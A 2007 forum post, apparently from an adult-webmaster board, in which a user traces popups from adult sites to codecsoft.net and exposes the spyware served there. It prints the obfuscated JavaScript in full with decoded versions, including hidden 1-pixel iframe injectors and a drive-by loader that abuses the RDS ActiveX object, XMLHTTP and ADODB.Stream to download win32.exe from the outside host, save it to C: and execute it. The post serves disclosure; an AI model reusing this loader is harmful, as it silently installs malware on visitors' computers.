Thread: Spyware is Killing our industry. Proof inside! Long Thread and VIDEO
View Single Post
Old 04-04-2007, 10:41 AM  
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
So I went to triplexporn.org which links/trades to top-amateur.com and on top-amateur.com there is a popup to nichetgp.com. Nichetgp and top-amateur are owned by the same individual.
On nichetgp.com is this code
Code:
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%30%36%34%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
which converts to
iframe src=http-//codecsoft.net/strong/064/ width=1 height=1></iframe
 and
codecsoft.net/adv/new.php?adv=64 width=1 height=1  with more obfuscated code
Now codecsoft.net has this code
Code:
document.write(unescape("%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%73%74%79%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29%7d%20%3c%2f%73%74%79%6c%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e
which translates to
document.write(unescape(\"// ? ¬¥haâ ਩ ha å :) -->
<style> * {CURSOR: url("123.htm")} </style>
<iframe src="exp1.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp2.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp3.htm" width="1" height="1"></iframe>
// ? ¬¥haâ ਩ ha å :) -->
<iframe src="exp4.htm" width="1" height="1"></iframe>
exp1.htm contains this code
Code:
document.write(unescape("%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%76%61%72%20%78%6e%61%6d%65%3d%27%6f%62%27%2b%27%6a%27%3b%0a%76%61%72%20%6f%62%6a%5f%52%44%53%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%78%6e%61%6d%65%2b%27%65%63%74%27%29%3b%0a%76%61%72%20%69%64%73%3d%27%69%27%2b%27%64%27%3b%0a%76%61%72%20%78%72%64%73%3d%27%52%27%2b%27%44%53%27%3b%0a%6f%62%6a%5f%52%44%53%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%69%64%73%2c%27%6f%62%6a%5f%27%2b%78%72%64%73%29%3b%0a%0a%76%61%72%20%63%6c%73%5f%69%64%31%3d%27%63%6c%27%2b%27%73%69%27%2b%27%64%3a%42%44%27%2b%27%39%36%43%35%27%3b%0a%76%61%72%20%63%6c%73%5f%69%64%32%3d%27%35%36%27%2b%27%2d%36%35%27%2b%27%41%33%2d%31%31%27%2b%27%44%30%2d%39%38%33%41%27%2b%27%2d%30%30%43%30%34%27%2b%27%46%43%32%39%45%33%36%27%3b%0a%6f%62%6a%5f%52%44%53%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%27%63%6c%61%73%73%69%64%27%2c%63%6c%73%5f%69%64%31%2b%63%6c%73%5f%69%64%32%29%3b%0a%0a%76%61%72%20%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%30%3b%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%76%61%72%20%78%6e%61%6d%65%5f%73%74%72%3d%22%61%64%22%2b%22%6f%64%62%2e%73%22%2b%22%74%72%65%61%6d%22%3b%0a%74%72%79%20%7b%20%76%61%72%20%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%6f%62%6a%5f%52%44%53%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%78%6e%61%6d%65%5f%73%74%72%2c%22%22%29%3b%20%0a%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%69%66%20%28%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%21%3d%20%31%29%20%0a%7b%20%74%72%79%20%7b%20%76%61%72%20%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%78%6e%61%6d%65%5f%73%74%72%29%3b%20%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%7d%20%0a%69%66%20%28%69%73%5f%5f%6f%62%6a%5f%61%64%6f%64%62%20%3d%3d%20%31%29%20%7b%20%74%72%79%20%7b%20%0a%76%61%72%20%61%70%70%6c%5f%3d%22%53%68%22%2b%22%65%6c%22%2b%22%6c%2e%41%70%70%22%2b%22%6c%69%63%61%22%2b%22%74%69%6f%6e%22%3b%0a%76%61%72%20%6f%62%6a%5f%53%68%65%6c%6c%41%70%70%20%3d%20%6f%62%6a%5f%52%44%53%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%70%70%6c%5f%2c%22%22%29%3b%0a%76%61%72%20%78%6d%6c%5f%6e%61%6d%65%3d%22%6d%73%22%2b%22%78%6d%22%2b%22%6c%32%2e%58%22%2b%22%4d%4c%48%22%2b%22%54%54%50%22%3b%0a%76%61%72%20%6f%62%6a%5f%6d%73%78%6d%6c%32%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%78%6d%6c%5f%6e%61%6d%65%29%3b%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%6f%70%65%6e%28%22%47%22%2b%22%45%54%22%2c%22%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%61%64%76%2f%30%36%34%2f%77%69%6e%33%32%2e%65%78%65%22%2c%66%61%6c%73%65%29%3b%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%0a%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%73%65%6e%64%28%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%74%79%70%65%20%3d%20%31%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%6f%70%65%6e%28%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%57%72%69%74%65%28%6f%62%6a%5f%6d%73%78%6d%6c%32%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%29%3b%20%0a%0a%2f%2f%20%8a%a0%ac%a5%ad%e2%a0%e0%a8%a9%20%ad%a0%e5%20%3a%29%20%2d%2d%3e%0a%0a%76%61%72%20%66%6e%20%3d%20%22%43%3a%5c%5c%78%78%31%32%33%32%32%35%35%22%2b%22%2e%65%22%2b%22%78%65%22%3b%20%6f%62%6a%5f%61%64%6f%64%62%2e%53%61%76%65%54%6f%46%69%6c%65%28%66%6e%2c%32%29%3b%20%0a%6f%62%6a%5f%61%64%6f%64%62%2e%63%6c%6f%73%65%28%29%3b%20%6f%62%6a%5f%53%68%65%6c%6c%41%70%70%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%66%6e%29%3b%20%7d%20%63%61%74%63%68%28%65%29%7b%7d%20%7d%20%3c%2f%73%63%72%69%70%74%3e"));
which translates to
document.write(unescape(\"<script language="JavaScript"> 

// ? ¬¥haâ ਩ ha å :) -->
var xname='ob' 'j';
var obj_RDS = document.createElement(xname 'ect');
var ids='i' 'd';
var xrds='R' 'DS';
obj_RDS.setAttribute(ids,'obj_' xrds);

var cls_id1='cl' 'si' 'd:BD' '96C5';
var cls_id2='56' '-65' 'A3-11' 'D0-983A' '-00C04' 'FC29E36';
obj_RDS.setAttribute('classid',cls_id1 cls_id2);

var is__obj_adodb = 0;
// ? ¬¥haâ ਩ ha å :) -->
var xname_str="ad" "odb.s" "tream";
try { var obj_adodb = obj_RDS.CreateObject(xname_str,""); 
is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) 
{ try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; } catch(e){} } 
if (is__obj_adodb == 1) { try { 
var appl_="Sh" "el" "l.App" "lica" "tion";
var obj_ShellApp = obj_RDS.CreateObject(appl_,"");
var xml_name="ms" "xm" "l2.X" "MLH" "TTP";
var obj_msxml2 = new ActiveXObject(xml_name);
// ? ¬¥haâ ਩ ha å :) -->
obj_msxml2.open("G" "ET","http---codecsoft.net/adv/064/win32.exe",false); 

// ? ¬¥haâ ਩ ha å :) -->

obj_msxml2.send(); 
obj_adodb.type = 1; 
obj_adodb.open(); 
obj_adodb.Write(obj_msxml2.responseBody); 

// ? ¬¥haâ ਩ ha å :) -->

var fn = "C:\\xx1232255" ".e" "xe"; obj_adodb.SaveToFile(fn,2); 
obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>\"));
Quickdraw is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote